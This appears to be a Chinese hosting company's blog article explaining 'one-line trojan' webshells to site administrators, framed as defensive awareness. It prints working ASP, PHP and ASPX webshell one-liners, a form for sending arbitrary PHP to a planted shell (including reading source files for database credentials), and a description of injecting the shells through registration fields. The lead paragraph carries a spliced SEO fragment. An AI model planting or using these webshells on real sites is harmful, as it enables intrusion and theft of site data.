導讀:建站文章建站文章作為網站管理員或站長，不得不應對各種黑客入侵行為，萬維景盛工程師今天向大家介紹認識一種常見的黑客木馬文件——一句話木馬。古人云：“知己知彼，百戰不殆”。只有了解網站怎么搭建快速建站技術。

作為網站管理員或站長，不得不應對各種黑客入侵行為，萬維景盛工程師今天向大家介紹認識一種常見的黑客木馬文件——一句話木馬。古人云：“知己知彼，百戰不殆”。只有了解黑客的入侵工具和行為特征，才能更好地做好網站防護。一句話木馬是一種基于B/S結構的簡短腳本，通過這個腳本，執行POST來的任意參數語句，可以提交任意內容，黑客借此進行SQL注入或拿到SHELL寫入大馬或截取網站私密信息，達到注入非法信息等的目的。

這個程序把提交的數據當PHP語句執行，利用這個功能可以查看甚至修改你的數據庫數據和文件。使用的方法可以隨便編寫一個HTML來完成，例如：

<form method=post action=http://....../你的名字.php>  

<textarea name=cmd>  

//這里面寫PHP程序，隨便連接數據和修改文件都可以，當然也可以用下面的語句查看你的PHP源文件來獲取數據庫路徑和密碼  

$str=file_get_content('xxx.php');  

$str=str_replace('<','&lt;',$str);  

echo "<pre>$str</pre>"  

</textarea>  

<input type=submit>  

</form>  

黑客在注冊信息的電子郵箱或者個人主頁等中插入類似如下代碼：

<%execute request("value")%>  

其中value是值，所以你可以更改自己的值，前面的request就是獲取這個值

<%eval request("value")%>  

(現在比較多見的，而且字符少，對表單字數有限制的地方特別的實用)

當知道了數據庫的URL，就可以利用本地一張網頁進行連接得到Webshell。（不知道數據庫也可以，只要知道這個文件被插入到哪一個ASP文件里面就可以了。）

常用一句話木馬

asp一句話木馬：

　　

<%execute(request("value"))%>  

　　php一句話木馬：

　　

<?php @eval($_POST[value]);?>  

　　aspx一句話木馬：

<%@ Page Language="Jscript"%>  

  

<%eval(Request.Item["value"])%>  

關鍵詞標簽: 建站 句話 木馬